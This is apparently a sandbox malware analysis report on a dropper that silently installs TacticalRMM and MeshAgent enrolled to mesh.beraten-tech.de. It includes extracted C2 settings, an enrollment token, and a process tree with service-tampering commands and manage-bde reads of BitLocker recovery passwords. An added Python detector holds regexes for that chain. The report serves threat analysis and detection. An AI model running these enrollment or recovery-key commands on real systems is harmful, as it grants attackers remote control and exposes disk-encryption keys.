Analysis

  • max time kernel
    139s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20241007-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    19-11-2024 10:45

General

  • Target

    2024-11-19_d0e9d314c29867185f9e802dcc490060_frostygoop_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    d0e9d314c29867185f9e802dcc490060

  • SHA1

    497aebefbb560065ab9c29d1faa96c8fed56146c

  • SHA256

    04db464b6a31437b0932cc3d86b2633c090af01a60423bcbc562364c899f2112

  • SHA512

    8423cfdc2a99806717b588c44bb65eb942aed051dfdb41ebfb3295555c0ed983fcc9d007c28b05b7eb9e2ba471038a102017fa13e39c756abb136eaa2e7ab317

  • SSDEEP

    49152:kgvUDWv4e4uPpV1wrb/T8vO90d7HjmAFd4A64nsfJJKyutrDb4HGw1lfVGlJS5ZL:D4e4uPpVm6gTVGIO7DfE++eC

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

TacticalRMM

C2

http://mesh.beraten-tech.de:443/agent.ashx

Attributes
  • mesh_id

    0xC2DBF8D5176E2795D03D1F2086E24D8503399C5B811169DE7D09CDA90EEF410CBE81B01B8A75A397214216EBA8427CB0

  • server_id

    AD48C3AA51248216A8C92D3FC4C1113ED99033BBAA3EAD73F71E07AACE6B685586E90C16830E5A7CE432D425CA12A7C6

  • wss

    wss://mesh.beraten-tech.de:443/agent.ashx

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is the open-source remote-management agent of the MeshCentral project. Sandboxes classify it as a remote access trojan because the same binary, enrolled against a MeshCentral server the victim does not control, gives that server's operator full interactive control of the host; here it is enrolled against mesh.beraten-tech.de.

  • Meshagent family
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 2 IoCs

    sc.exe is the Windows service control utility; in this run it deletes the existing tacticalagent and tacticalrpc services before the installer re-registers the agent service.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs commands through powershell.exe. The four instances here are children of the MeshAgent service and use -noprofile -nologo -command -, so the script text is supplied on standard input and does not appear on the command line.

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems. The trigger in this run is ping 127.0.0.1 -n 2, a loopback ping the installer uses as a short delay before net stop; it does not test Internet reachability.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-11-19_d0e9d314c29867185f9e802dcc490060_frostygoop_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-11-19_d0e9d314c29867185f9e802dcc490060_frostygoop_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4968
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1064
      • C:\Users\Admin\AppData\Local\Temp\is-UREE5.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-UREE5.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$1A0054,3652845,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3620
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1952
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2340
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4756
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:5040
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3468
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4760
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3188
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1816
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3560
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3864
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2296
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2956
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2400
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4272
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4668
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5072
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4568
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2372
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3292
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3820
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1980
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.beraten-tech.de --client-id 1 --site-id 6 --agent-type workstation --auth dc3b53205b645d6c81dccd9d4bc35f3799b67dcb0aa0d3f196a48493e8cf1da6
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4516
      • C:\Program Files\TacticalAgent\meshagent.exe
        "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        PID:4056
      • C:\Program Files\Mesh Agent\MeshAgent.exe
        "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
        3⤵
        • Executes dropped EXE
        PID:4856
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    PID:1924
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4892
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:548
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3784
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:1692
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:2956
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:3084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in System32 directory
      • Command and Scripting Interpreter: PowerShell
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:1584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in System32 directory
      • Command and Scripting Interpreter: PowerShell
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:3988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in System32 directory
      • Command and Scripting Interpreter: PowerShell
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:4088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:1232
    • C:\Windows\system32\cmd.exe
      /c manage-bde -protectors -get C: -Type recoverypassword
      2⤵
      PID:4884
      • C:\Windows\system32\manage-bde.exe
        manage-bde -protectors -get C: -Type recoverypassword
        3⤵
        PID:3684
    • C:\Windows\system32\cmd.exe
      /c manage-bde -protectors -get F: -Type recoverypassword
      2⤵
      PID:4520
      • C:\Windows\system32\manage-bde.exe
        manage-bde -protectors -get F: -Type recoverypassword
        3⤵
        PID:2852
  • C:\Program Files\TacticalAgent\tacticalrmm.exe
    "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
    1⤵
    • Executes dropped EXE
    • Modifies data under HKEY_USERS
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    PID:4772
  • C:\Program Files\TacticalAgent\tacticalrmm.exe
    "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
    1⤵
    • Executes dropped EXE
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    PID:2268
  • C:\Program Files\TacticalAgent\tacticalrmm.exe
    "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
    1⤵
    • Executes dropped EXE
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    PID:2316
  • C:\Program Files\TacticalAgent\tacticalrmm.exe
    "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
    1⤵
    • Executes dropped EXE
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    PID:432
  • C:\Program Files\TacticalAgent\tacticalrmm.exe
    "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
    1⤵
    • Executes dropped EXE
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    PID:2468
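
The tree above records one enrollment procedure: the dropper writes the TacticalRMM agent installer to C:\ProgramData\TacticalRMM and runs it with /VERYSILENT; the installer stops and deletes any existing tacticalrpc, tacticalagent and tacticalrmm services and re-registers the service with -m installsvc; tacticalrmm.exe then enrols with --api https://api.beraten-tech.de and a 64-hex-character --auth token and installs MeshAgent with -fullinstall; the MeshAgent service later spawns manage-bde to read the BitLocker recovery passwords of C: and F:. The following Python is an added example, not code from the sandbox vendor, TacticalRMM or MeshCentral: it scores process-creation records for that chain and only reports the chain when service tampering, the token enrollment and the MeshAgent install share one root process, since each piece on its own is normal RMM activity. The records are constructed from the PIDs and command lines in the tree; the dropper file name, the parent PID 1 of the two roots and the ATT&CK IDs are the editor's own.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    cmdline: str


@dataclass(frozen=True)
class Hit:
    rule: str
    technique: Optional[str]  # ATT&CK ID where the mapping is unambiguous, else None
    pid: int
    root: int                 # top-most ancestor among the supplied records


# Hosts the sandbox observed for this sample (the report's C2 and --api values).
KNOWN_C2_HOSTS = {"mesh.beraten-tech.de", "api.beraten-tech.de"}

# (rule, regex over the lower-cased command line, ATT&CK technique or None).
# Service names are the ones the installer stops, deletes and re-creates.
RULES = (
    ("rmm_silent_installer", r"tacticalagent-v[\d.]+-windows-\w+\.(?:exe|tmp)\b.*/verysilent", "T1219"),
    ("service_stop", r"\bnet1?\s+stop\s+(?:tacticalrmm|tacticalrpc|tacticalagent)\b", "T1489"),
    ("service_delete", r"\bsc\s+delete\s+(?:tacticalrmm|tacticalrpc|tacticalagent)\b", "T1489"),
    ("rmm_enroll_with_token", r"tacticalrmm\.exe.*\s-m\s+install\b.*--auth\s+[0-9a-f]{64}\b", "T1219"),
    ("meshagent_fullinstall", r"meshagent\.exe.*\s-fullinstall\b", "T1219"),
    ("bitlocker_recovery_read", r"manage-bde\s+-protectors\s+-get\s+[a-z]:\s+-type\s+recoverypassword", None),
)
ENROLL_ARG = re.compile(r"--(api|client-id|site-id|agent-type|auth)\s+(\S+)")
URL_HOST = re.compile(r"\b(?:https?|wss?)://([\w.-]+)", re.I)


def root_of(pid, by_pid):
    """Follow ppid links upward; stop at an unknown parent or a cycle."""
    seen = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def analyse(events):
    """Return rule hits, roots under which the whole chain occurred, known C2
    hosts seen on any command line, and the parsed enrollment arguments."""
    by_pid = {e.pid: e for e in events}
    hits, rules_by_root, hosts, enrollment = [], defaultdict(set), set(), {}
    for e in events:
        low, root = e.cmdline.lower(), root_of(e.pid, by_pid)
        hosts.update(h.lower() for h in URL_HOST.findall(e.cmdline))
        for rule, pattern, tech in RULES:
            if not re.search(pattern, low):
                continue
            hits.append(Hit(rule, tech, e.pid, root))
            rules_by_root[root].add(rule)
            if rule == "rmm_enroll_with_token":
                enrollment = dict(ENROLL_ARG.findall(e.cmdline))
    # The chain needs service tampering, a token enrollment and the MeshAgent
    # install under a single ancestor; each piece alone is ordinary RMM activity.
    chain_roots = sorted(
        root for root, rules in rules_by_root.items()
        if rules & {"service_stop", "service_delete"}
        and {"rmm_enroll_with_token", "meshagent_fullinstall"} <= rules)
    return {"hits": hits, "chain_roots": chain_roots,
            "c2_hosts_seen": sorted(hosts & KNOWN_C2_HOSTS),
            "enrollment": enrollment}


# Constructed records: PIDs and command lines follow the tree in the report; the
# dropper file name and the parent PID 1 of the two roots are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(4968, 1, r'"C:\Users\Admin\AppData\Local\Temp\dropper.exe"'),
    ProcEvent(1064, 4968, r"C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES"),
    ProcEvent(3620, 1064, r'"C:\Users\Admin\AppData\Local\Temp\is-UREE5.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /VERYSILENT /SUPPRESSMSGBOXES'),
    ProcEvent(1952, 3620, r'"cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc'),
    ProcEvent(3468, 3620, r'"cmd.exe" /c net stop tacticalagent'),
    ProcEvent(4272, 3620, r'"cmd.exe" /c sc delete tacticalagent'),
    ProcEvent(2704, 3620, r'"cmd.exe" /c tacticalrmm.exe -m installsvc'),
    ProcEvent(4516, 4968, r'"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.beraten-tech.de '
                          r'--client-id 1 --site-id 6 --agent-type workstation --auth dc3b53205b645d6c81dccd9d4bc35f3799b67dcb0aa0d3f196a48493e8cf1da6'),
    ProcEvent(4056, 4516, r'"C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall'),
    ProcEvent(1924, 1, r'"C:\Program Files\Mesh Agent\MeshAgent.exe"'),
    ProcEvent(4884, 1924, r"/c manage-bde -protectors -get C: -Type recoverypassword"),
    ProcEvent(3684, 4884, r"manage-bde -protectors -get C: -Type recoverypassword"),
]

if __name__ == "__main__":
    result = analyse(SAMPLE_EVENTS)
    for h in result["hits"]:
        print(f"{h.rule:24} pid={h.pid:<5} root={h.root:<5} {h.technique or '-'}")
    print("chain root(s):", result["chain_roots"], "| C2 hosts:", result["c2_hosts_seen"])
    print("enrollment:", result["enrollment"])
```

Feeding real telemetry only needs the pid, ppid and command-line fields of Sysmon Event ID 1 or Security 4688 records. A hit on rmm_enroll_with_token by itself is expected on any fleet that uses TacticalRMM; what separates this sample from sanctioned deployment is the --api host and mesh server, so compare c2_hosts_seen and the api value in enrollment against the RMM servers your organisation actually operates.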

Network

MITRE ATT&CK Enterprise v15

Downloads

                • C:\Program Files\Mesh Agent\MeshAgent.db

                  Filesize

                  153KB

                  MD5

                  e83b0b4c725becb80edbff0bf4c75a00

                  SHA1

                  fcdb258c4a63bf6fb5dc2029e76312a675f59f7b

                  SHA256

                  da8d9d0c0e22c7fee4112f4903e43737a63c22a5836413b0d3ab8e48c71fb234

                  SHA512

                  af29928f14666f64f0af0841595e29990cb22dace49d41315d4a91c62fbe0e030c8a5ad963c3bf79fee38d7eaf3e33265adf9045cffb14b4339d07fb99d46767

                • C:\Program Files\TacticalAgent\agent.log

                  Filesize

                  115B

                  MD5

                  9d346d3a09169b2bb9f89a5b4a02954a

                  SHA1

                  af6e386266c682771e855f4fb2cdec2294797a1f

                  SHA256

                  1e92a2dc73fdfcb7aa7e456f337f49cbfd42be50f02c37e45bb13adce02351bb

                  SHA512

                  10b9c73867654e1d35c8c3c53ab54bad8698eac0110024bba28649388d1cda29b9dc62b76e5062f4ec67ebed38efa487e0292a0dd31e0d5f764df00b1e633397

                • C:\Program Files\TacticalAgent\agent.log

                  Filesize

                  230B

                  MD5

                  1dafbe146b770bbdecccf394fad9c15f

                  SHA1

                  ead1dc1559a6fd8b2b5b9795dbc969f3016adc73

                  SHA256

                  47cda497bfea03f0709b07fd3479bb03066841d37ede4267d7dd855724649f58

                  SHA512

                  b158b83a3bcdbf7a4fe502dffafca489aad93f4ed393db76cc971e2517ea5bb4ffbe1d120101de7c524fdd2fe7646b279a3b7433d65129f8dbb447599094a8d1

                • C:\Program Files\TacticalAgent\agent.log

                  Filesize

                  345B

                  MD5

                  c608345ba9fd364e7a0970e54e28af34

                  SHA1

                  d58184da4a74151db00871c9ce6b517a282f6a2e

                  SHA256

                  a29c86afe9983859a0cf7598ea76b6ae6ff77b34f7b2711a9aa8a323652feabd

                  SHA512

                  03c564c73b2c91463b2b7b6632d8a9160a9ab2c2369351fbb687b972b0368151ef99939b3eb6aa059065a501d44b5c45d8aa716d996e722998344bcc6fddc5b5

                • C:\Program Files\TacticalAgent\agent.log

                  Filesize

                  460B

                  MD5

                  3289c2e5869262553e9242f1d92da16a

                  SHA1

                  c40a5cc18fe326e1b71650ea9cd9d29d61760048

                  SHA256

                  9e2945db3277c70f05c49fb4639253220d492d4cde81cf5a89473d2617cc95c2

                  SHA512

                  5711d3d1441971d18e363b9d720a308acab3676a513ca96056508d6a4e69aa9b1c3bb7850bebab37691913012fabdb79bebbae8558f7126827cb246093cc79dc

                • C:\Program Files\TacticalAgent\meshagent.exe

                  Filesize

                  3.3MB

                  MD5

                  19a9bc4fa27b301997c94b10f652f54a

                  SHA1

                  45522bf1571f8e4130ac5346d6a5797eb8ff867a

                  SHA256

                  c3fe37b641c80ea4c863f9bf08faf32b6ac5c9a7f250bca14fca5beab7f12971

                  SHA512

                  0834d954e10681efe15305a158503085f8da6873e2b3ca36b95ea7bb7df12c11a3b38994712f17344535712b13816eb974df0dd70dd229770e4ad566a9dd821e

                • C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography-42.0.8.dist-info\INSTALLER

                  Filesize

                  4B

                  MD5

                  365c9bfeb7d89244f2ce01c1de44cb85

                  SHA1

                  d7a03141d5d6b1e88b6b59ef08b6681df212c599

                  SHA256

                  ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

                  SHA512

                  d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

                • C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pyasn1\codec\native\__init__.py

                  Filesize

                  59B

                  MD5

                  0fc1b4d3e705f5c110975b1b90d43670

                  SHA1

                  14a9b683b19e8d7d9cb25262cdefcb72109b5569

                  SHA256

                  1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d

                  SHA512

                  8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81

                • C:\Program Files\TacticalAgent\tacticalrmm.exe

                  Filesize

                  9.2MB

                  MD5

                  6cfbd2da5f304a3b8972eafe6fe4d191

                  SHA1

                  09c1600064cb9d157c55c88f76f107373404b2ae

                  SHA256

                  ad29d4e9e01870ffbdb6f2498e6ce36a708e56db2ad431ba2d80bf5a6caac069

                  SHA512

                  03a29d2eb00a97b3fc83e55a8b8b1fe3e7adbb06fe598ed5525bb3764caced0bf5a28a3fd70e36b66687fcce5a9e7c9243ee6ab3a82d394044f3c60714a423e8

                • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe

                  Filesize

                  4.3MB

                  MD5

                  ed40540e7432bacaa08a6cd6a9f63004

                  SHA1

                  9c12db9fd406067162e9a01b2c6a34a5c360ea97

                  SHA256

                  d6c7bdab07151678b713a02efe7ad5281b194b0d5b538061bdafdf2c4ca1fdaa

                  SHA512

                  07653d534a998248f897a2ed962d2ec83947c094aa7fe4fb85e40cb2771754289fe2cef29e31b5aa08e8165d5418fe1b8049dedc653e799089d5c13e02352e8d

                • C:\Users\Admin\AppData\Local\Temp\is-UREE5.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

                  Filesize

                  3.0MB

                  MD5

                  a639312111d278fee4f70299c134d620

                  SHA1

                  6144ca6e18a5444cdb9b633a6efee67aff931115

                  SHA256

                  4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

                  SHA512

                  f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

                • C:\Windows\Temp\__PSScriptPolicyTest_h2powjxk.pip.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  06d16fea6ab505097d16fcaa32949d47

                  SHA1

                  0c1c719831fa41cd102d0d72d61c0f46ec5b8de8

                  SHA256

                  54e15de2bef9f651d7717e2a336ac6b2ea2b723e6f29d2b153d8fbbc89aef723

                  SHA512

                  03c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                  Filesize

                  2KB

                  MD5

                  b2ef2d4d15c695cd2a0c17491e05b054

                  SHA1

                  b10791244ee206ed5722cb5a4c2b480d21ce47d9

                  SHA256

                  efeea1a94044c8eb71a748a8829c0a946c6c460c24c5d045a5833d0f0520a97e

                  SHA512

                  291bcf3cce318c1a57ed745880a5eeae034908353ec0ed1e5602a58886f47b06b8e9cdcdbd9584a989f7477358462099c140a89797a1114d9f318a9107a26806

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                  Filesize

                  2KB

                  MD5

                  3a15434cec5e0fcf2e27f77751a8d727

                  SHA1

                  35ec0a9ea5b96e2506607f198cca319302e21093

                  SHA256

                  c8462e55259fa90b2c1e954725ab7045f45c1fa802f99046bd241a237a09b68d

                  SHA512

                  bddb77aaf90b4733375a66b4f519f98e8fb31905bf532623dd7e54de0496de89ca763b877b1d54a8454d6d47156820948aa0e246531ebbfd0ffa87d8c5e39caf

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                  Filesize

                  2KB

                  MD5

                  2c0bdf06d302688498d4e7f9cd669ab5

                  SHA1

                  18186323d93499e03f737f137b4ad795eb7f470b

                  SHA256

                  86cd6b95819282eee4bd6c900b27ebeddf453a90a9f6147978e9137479f36bd6

                  SHA512

                  f8f02ab1cb6906975695369183d00d7f25ec4c54c40aba5ac0a1f42312c5eff5a6774a8e84c3357415555405f7e9754deebe8335dd1fdcf693137ab044cc18fe

                • memory/1064-8-0x0000000000401000-0x00000000004B7000-memory.dmp

                  Filesize

                  728KB

                • memory/1064-5-0x0000000000400000-0x00000000004D7000-memory.dmp

                  Filesize

                  860KB

                • memory/1064-26-0x0000000000400000-0x00000000004D7000-memory.dmp

                  Filesize

                  860KB

                • memory/1232-157-0x000001BCD69D0000-0x000001BCD6A85000-memory.dmp

                  Filesize

                  724KB

                • memory/1232-159-0x000001BCD6A90000-0x000001BCD6AB4000-memory.dmp

                  Filesize

                  144KB

                • memory/1232-158-0x000001BCD6A90000-0x000001BCD6ABA000-memory.dmp

                  Filesize

                  168KB

                • memory/1584-61-0x000001FC8BAC0000-0x000001FC8BAE2000-memory.dmp

                  Filesize

                  136KB

                • memory/1584-71-0x000001FCA4900000-0x000001FCA4944000-memory.dmp

                  Filesize

                  272KB

                • memory/1584-72-0x000001FCA49D0000-0x000001FCA4A46000-memory.dmp

                  Filesize

                  472KB

                • memory/3620-12-0x0000000000400000-0x0000000000712000-memory.dmp

                  Filesize

                  3.1MB

                • memory/3620-25-0x0000000000400000-0x0000000000712000-memory.dmp

                  Filesize

                  3.1MB

                • memory/3988-107-0x00000150CC9E0000-0x00000150CC9FA000-memory.dmp

                  Filesize

                  104KB

                • memory/3988-110-0x00000150CC9D0000-0x00000150CC9DA000-memory.dmp

                  Filesize

                  40KB

                • memory/3988-109-0x00000150CC9C0000-0x00000150CC9C6000-memory.dmp

                  Filesize

                  24KB

                • memory/3988-108-0x00000150CC850000-0x00000150CC858000-memory.dmp

                  Filesize

                  32KB

                • memory/3988-102-0x00000150CC820000-0x00000150CC83C000-memory.dmp

                  Filesize

                  112KB

                • memory/3988-106-0x00000150CC840000-0x00000150CC84A000-memory.dmp

                  Filesize

                  40KB

                • memory/3988-105-0x00000150CC9A0000-0x00000150CC9BC000-memory.dmp

                  Filesize

                  112KB

                • memory/3988-104-0x00000150CC780000-0x00000150CC78A000-memory.dmp

                  Filesize

                  40KB

                • memory/3988-103-0x00000150CC8E0000-0x00000150CC995000-memory.dmp

                  Filesize

                  724KB

